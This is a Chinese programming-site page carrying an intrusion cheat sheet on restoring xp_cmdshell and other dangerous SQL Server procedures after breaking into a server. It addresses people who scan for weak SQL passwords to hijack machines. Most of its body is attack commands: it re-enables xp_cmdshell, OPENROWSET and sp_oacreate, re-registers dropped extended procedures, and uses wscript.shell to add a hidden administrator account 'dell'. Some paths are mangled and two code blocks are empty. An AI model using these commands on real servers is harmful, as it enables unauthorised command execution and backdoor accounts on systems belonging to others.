位置: 编程技术 - 正文

SQL入侵恢复xp_cmdshell方法总结

编辑:rootadmin
SQL入侵恢复xp_cmdshell方法总结 sql server 下开启xp_cmdshell的办法 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; SQL开启'OPENROWSET'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE; SQL开启'sp_oacreate'支持的方法: exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE; 突破SA的各种困难 常见情况恢复执行xp_cmdshell 1 未能找到存储过程'master..xpcmdshell'. 恢复方法:查询分离器连接后, 第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog.dll'declare @o int 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 2 无法装载 DLL xpsql.dll 或该DLL所引用的某一 DLL。原因(找不到指定模块。) 恢复方法:查询分离器连接后, 第一步执行:sp_dropextendedproc "xp_cmdshell" 第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql.dll' 然后按F5键命令执行完毕 3 无法在库 xpweb.dll 中找到函数 xp_cmdshell。原因: (找不到指定的程序。) 恢复方法:查询分离器连接后, 第一步执行:exec sp_dropextendedproc 'xp_cmdshell' 第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb.dll' 然后按F5键命令执行完毕 四.终极方法. 如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户: 查询分离器连接后, servser系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:winntsystemcmd.exe /c net localgroup administrators dell /add' xp或server系统: declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net user dell huxifeng /add' declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:windowssystemcmd.exe /c net localgroup administrators dell /add' -------------- xp_cmdshell新的恢复办法 删除 drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 恢复 dbcc addextendedproc ("sp_oacreate","odsole.dll") dbcc addextendedproc ("xp_cmdshell","xplog.dll") 这样可以直接恢复,不用去管sp_addextendedproc是不是存在 ----------------------------- 删除扩展存储过过程xp_cmdshell的语句: exec sp_dropextendedproc 'xp_cmdshell' 恢复cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog.dll' 判断存储扩展是否存在 select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc 'xp_cmdshell','xplog.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' 返回结果为1就ok 否则上传xplog7.0.dll exec master.dbo.addextendedproc 'xp_cmdshell','c:winntsystemxplog.dll' 堵上cmdshell的sql语句 sp_dropextendedproc "xp_cmdshell ---------------- 删除sql危险存储: /*不狐 附上恢复扩展存储过程的办法 先恢复sp_addextendedproc,语句如下: SQL代码: 再恢复以上所有扩展存储过程 SQL代码: SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 经常扫SQL弱口令肉鸡的朋友应该遇见过这样的问题 ! 接下来我们用SQL语句搞定他 分析器执行的语句: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE

推荐整理分享SQL入侵恢复xp_cmdshell方法总结,希望有所帮助,仅作参考,欢迎阅读内容。

SQL入侵恢复xp_cmdshell方法总结

文章相关热门搜索词:,内容如对您有帮助,希望把文章链接给更多的朋友!

sqlserver 函数、存储过程、游标与事务模板 1.标量函数:结果为一个单一的值,可包含逻辑处理过程。其中不能用getdate()之类的不确定性系统函数.--标量值函数--==============================================

ADO.NET EF中的实体修改方法 1.传统修改模式,看下列代码using(NorthwindEntitiescontext=newNorthwindEntities()){Regionregion=context.Region.FirstOrDefault(v=v.RegionID==4);region.RegionDescription="Test";context.SaveCha

sqlserver 聚集索引和非聚集索引实例 createdatabasemyIndexDemogousemyIndexDemogocreatetableABC(Aintnotnull,Bchar(),Cvarchar())goinsertintoABCselect1,'B','C'unionselect5,'B','C'unionselect7,'B','C'unionselect9,'B','C'goselect*fromABC-

标签: SQL入侵恢复xp_cmdshell方法总结

本文链接地址:https://www.jiuchutong.com/biancheng/349165.html 转载请保留说明!

上一篇:世界杯猜想活动的各类榜单的SQL语句小结(世界杯猜测)

下一篇:sqlserver 函数、存储过程、游标与事务模板(sqlserver函数大全)

  • PHP实现的登录,注册及密码修改功能分析(php用户登录界面代码)

    PHP实现的登录,注册及密码修改功能分析(php用户登录界面代码)

  • MongoDB中MapReduce编程模型使用实例

    MongoDB中MapReduce编程模型使用实例

  • vc6Secs.exe是什么进程(vc6_cn_full.exe)

    vc6Secs.exe是什么进程(vc6_cn_full.exe)

  • Linux使用Shellscript安装网卡驱动简单实用快捷(linux使用shell脚本创建文件)

    Linux使用Shellscript安装网卡驱动简单实用快捷(linux使用shell脚本创建文件)

  • javascript实现右侧弹出“分享到”窗口效果(js自定义鼠标右键菜单)

    javascript实现右侧弹出“分享到”窗口效果(js自定义鼠标右键菜单)

  • 房产税如何
  • 计提环境保护税怎么做分录
  • 员工宿舍买热水器计入什么费用
  • 期末结转增值税
  • 产权转移书据印花税分录
  • 企业资产重组是不定期清查吗
  • 计提存货减值准备怎么算
  • 编制利润表会计等式
  • 委托贷款业务涉嫌诈骗吗
  • 代扣代缴城建税可以享受六税两费
  • 开专票都需要什么资料
  • 销项负数发票用勾选吗
  • 运输公司租入的车辆如何核算
  • 暂估入库的材料领用时如何做账
  • 购入但未开始使用的房产
  • 认缴制下实收资本如何缴纳印花税
  • 营改增后小规模纳税人
  • 怎么才能知道开户行行号
  • 工程材料发票备注栏未备注可以进成本吗
  • 在公司发现问题该说吗
  • 如何辩别这样发票的真伪?
  • 旅行社代订机票发票写个人能报销吗
  • 补缴去年的社保怎么做账
  • 一般纳税人差额申报表填写
  • 现金支票工本费发票
  • 企业转让销售配额怎么算
  • win11怎么把默认c盘改到d盘
  • mac怎么把文件发给别人
  • 收到别的公司对公转账往来
  • 显示器屏幕抖动闪烁是什么原因
  • 施工项目费用明细表模板
  • 完成认证后开具什么证明
  • dl.php怎么打开
  • php 解析
  • 累计折旧在贷方还是借方
  • 认识数据库思维导图
  • 关于我和鬼变成家人的那件事
  • 销货退回与折让属于什么科目
  • python清除变量的命令
  • 对公户取备用金给员工
  • 税控盘开票机号在哪里能查到
  • 税金及附加怎么做分录
  • 税务信用级别A有什么好处
  • 应纳税所得额计入什么科目
  • mysql proxy问题的解决方法
  • 库存商品转成本意味着什么
  • 第一次建账要填期初余额吗
  • 小微企业是怎样自己认定的呢
  • 某企业2013年12月30日购入一台不需要安装的设备
  • 其他债权投资的特征有哪些
  • 个贷系统平账专户A户付款会计分录
  • 总公司给分公司拨款怎么做账
  • 股权转让账务咋处理
  • 银行收的账户管理费
  • 预付款开票货还没发
  • 支付宝已经支付快递费怎么还支付
  • 年底盈利但有往年亏损怎么处理
  • 专票和普票的作用
  • 期末未缴税额为正是什么意思
  • Linux环境mysql5.7.12安装教程
  • mysql转换数据类型
  • 让Vista响应更快
  • win10补丁导致无法开机
  • linux开机启动ftp
  • windows 批处理
  • win8系统教程
  • 怎样禁用ie
  • Linux开机启动文件
  • win7突然变卡顿怎么回事
  • win7不能自动启动
  • win10系统无线网络连接在哪
  • android 欢迎页
  • nodemcu连接阿里云
  • jquery中绑定和解绑的事件有哪些
  • jquery设置禁用
  • linux装python环境
  • js设计模型
  • 税务局上班周末上班吗
  • 云南税务局发票查询
  • 建筑工程招标代理服务费
    • 免责声明:网站部分图片文字素材来源于网络,如有侵权,请及时告知,我们会第一时间删除,谢谢! 邮箱:opceo@qq.com

    鄂ICP备2023003026号

    网站地图: 企业信息 工商信息 财税知识 网络常识 编程技术

    友情链接: 武汉网站建设